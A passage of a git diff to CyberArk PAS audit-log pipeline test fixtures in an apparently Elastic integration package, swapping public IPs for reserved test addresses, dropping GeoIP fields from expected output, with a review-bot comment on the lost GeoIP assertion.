\u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n 
\u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Set Password", "message": "Set Password", "issuer": "PSMPApp_SSH", 
@@ -1028,8 +893,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212167700Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:25\",\"IsoTimestamp\":\"2021-03-14T12:57:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_SSH\",\"Action\":\"Set 
Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320203Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:25\",\"IsoTimestamp\":\"2021-03-14T12:57:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set 
Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_SSH\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } @@ -1041,17 +906,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.71.250.247", - "ip": "34.71.250.247" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -1068,7 +924,7 @@ }, "related": { "ip": [ - "34.71.250.247" + "67.43.156.15" ] }, "cyberarkpas": { 
@@ -1076,8 +932,8 @@ "severity": "Info", "rfc5424": true, "iso_timestamp": "2021-03-14T12:57:25Z", - "station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e88\u003c/MessageID\u003e\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\n 
\u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/Issuer\u003e\n \u003cAction\u003eSet Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003e\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eSet Password\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Set Password", "message": "Set Password", "issuer": "PSMP_ADB_asr-cyberark-psm-ssh", 
@@ -1091,8 +947,8 @@ "event": { "severity": 2, "action": "set password", - "ingested": "2021-06-09T10:24:37.212182200Z", - "original": "\u003c5\u003e1 2021-03-14T12:57:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e34.71.250.247\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:25\",\"IsoTimestamp\":\"2021-03-14T12:57:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_asr-cyberark-psm-ssh\",\"Action\":\"Set 
Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"34.71.250.247\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:13.320208600Z", + "original": "\u003c5\u003e1 2021-03-14T12:57:25Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 05:57:25\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T12:57:25Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e88\u003c/MessageID\u003e\\n \u003cDesc\u003eSet Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMP_ADB_asr-cyberark-psm-ssh\u003c/Issuer\u003e\\n \u003cAction\u003eSet Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eSet Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 
05:57:25\",\"IsoTimestamp\":\"2021-03-14T12:57:25Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"88\",\"Desc\":\"Set Password\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_asr-cyberark-psm-ssh\",\"Action\":\"Set Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Set Password\",\"GatewayStation\":\"\"}}}", "code": "88", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log index f3062f7ea56..a0bb4b16a06 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log 
@@ -1,4 +1,4 @@
 <5>1 2021-03-08T18:24:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:50","IsoTimestamp":"2021-03-08T18:24:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"PVWAAppUser","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAPrivateUserPrefs","File":"Root\\YWRtaW5pc3RyYXRvcg==","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}}
-<5>1 2021-03-10T18:44:08Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:44:08","IsoTimestamp":"2021-03-10T18:44:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}}
-<5>1 2021-03-10T22:17:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:40","IsoTimestamp":"2021-03-10T22:17:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}}
+<5>1 2021-03-10T18:44:08Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 10:44:08","IsoTimestamp":"2021-03-10T18:44:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}}
+<5>1 2021-03-10T22:17:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:40","IsoTimestamp":"2021-03-10T22:17:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"ROOT\\PVConfiguration.xml","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":""}}}
 <5>1 2021-03-11T19:45:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 11:45:26\n 2021-03-11T19:45:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 98\n Open File (Write Only)\n Info\n Administrator\n Open File (Write Only)\n \n \n PVWAConfig\n Root\\PVConfiguration.xml\n 127.0.0.1\n \n \n \n \n \n Open File (Write Only)\n 10.0.1.20\n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 11:45:26","IsoTimestamp":"2021-03-11T19:45:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"98","Desc":"Open File (Write Only)","Severity":"Info","Issuer":"Administrator","Action":"Open File (Write 
Only)","SourceUser":"","TargetUser":"","Safe":"PVWAConfig","File":"Root\\PVConfiguration.xml","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Open File (Write Only)","GatewayStation":"10.0.1.20"}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log-expected.json index c3b133e2ebe..56d1d0b1fb3 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-98-open-file-write-only.log-expected.json @@ -52,7 +52,7 @@ "event": { "severity": 2, "action": "open file (write only)", - "ingested": "2021-06-09T10:24:37.546522700Z", + "ingested": "2021-12-09T13:37:14.711383300Z", "original": "\u003c5\u003e1 2021-03-08T18:24:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:24:50\",\"IsoTimestamp\":\"2021-03-08T18:24:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write Only)\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAPrivateUserPrefs\",\"File\":\"Root\\\\YWRtaW5pc3RyYXRvcg==\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"\"}}}", "code": "98", "kind": "event" 
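Review bot: Swapping the two `Station` values to 67.43.156.13 and 67.43.156.14 is fine, but the companion expected-output hunks for the same events drop the whole `source.geo` object and keep only `source.address`/`source.ip`, so after this change the fixture no longer asserts that the audit pipeline's GeoIP enrichment of `source.ip` runs at all. If the pipeline test stack is deliberately run without a GeoIP database that is expected; otherwise confirm that at least one audit pipeline test still pins `source.geo`, since a silently broken or removed geoip processor would now pass. The `.log` fixture itself cannot carry a comment, so the convention that test addresses must come from the reserved range should be written down where the next fixture author will see it, e.g. a line in the data stream's test README: `Use addresses from 67.43.156.0/24 (and the other ranges supported by the test GeoIP database) for any public Station/GatewayStation value; never a real customer or cloud-provider IP.` The unchanged first and last lines of this hunk already use private/loopback addresses (10.0.1.20, 127.0.0.1) and need no change.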
@@ -65,20 +65,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -98,7 +86,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -108,7 +96,7 @@ "iso_timestamp": "2021-03-10T18:44:08Z", "file": "ROOT\\PVConfiguration.xml", "safe": "PVWAConfig", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Open File (Write Only)", "message": "Open File (Write Only)", "issuer": "Administrator", 
@@ -122,8 +110,8 @@ "event": { "severity": 2, "action": "open file (write only)", - "ingested": "2021-06-09T10:24:37.546544100Z", - "original": "\u003c5\u003e1 2021-03-10T18:44:08Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:44:08\",\"IsoTimestamp\":\"2021-03-10T18:44:08Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write Only)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"ROOT\\\\PVConfiguration.xml\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:14.711392300Z", + "original": "\u003c5\u003e1 2021-03-10T18:44:08Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 10:44:08\",\"IsoTimestamp\":\"2021-03-10T18:44:08Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write Only)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"ROOT\\\\PVConfiguration.xml\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"\"}}}", "code": "98", "kind": "event" } 
@@ -135,19 +123,8 @@ } }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-VA", - "country_name": "United States", - "region_name": "Virginia", - "location": { - "lon": -77.2481, - "lat": 38.6583 - }, - "country_iso_code": "US" - }, - "address": "35.192.121.42", - "ip": "35.192.121.42" + "address": "67.43.156.14", + "ip": "67.43.156.14" }, "tags": [ "preserve_original_event" @@ -167,7 +144,7 @@ }, "related": { "ip": [ - "35.192.121.42" + "67.43.156.14" ] }, "cyberarkpas": { @@ -177,7 +154,7 @@ "iso_timestamp": "2021-03-10T22:17:40Z", "file": "ROOT\\PVConfiguration.xml", "safe": "PVWAConfig", - "station": "35.192.121.42", + "station": "67.43.156.14", "action": "Open File (Write Only)", "message": "Open File (Write Only)", "issuer": "Administrator", 
@@ -191,8 +168,8 @@ "event": { "severity": 2, "action": "open file (write only)", - "ingested": "2021-06-09T10:24:37.546545600Z", - "original": "\u003c5\u003e1 2021-03-10T22:17:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:40\",\"IsoTimestamp\":\"2021-03-10T22:17:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write Only)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"ROOT\\\\PVConfiguration.xml\",\"Station\":\"35.192.121.42\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:37:14.711398Z", + "original": "\u003c5\u003e1 2021-03-10T22:17:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:40\",\"IsoTimestamp\":\"2021-03-10T22:17:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"98\",\"Desc\":\"Open File (Write Only)\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Open File (Write Only)\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PVWAConfig\",\"File\":\"ROOT\\\\PVConfiguration.xml\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Open File (Write Only)\",\"GatewayStation\":\"\"}}}", "code": "98", "kind": "event" } 
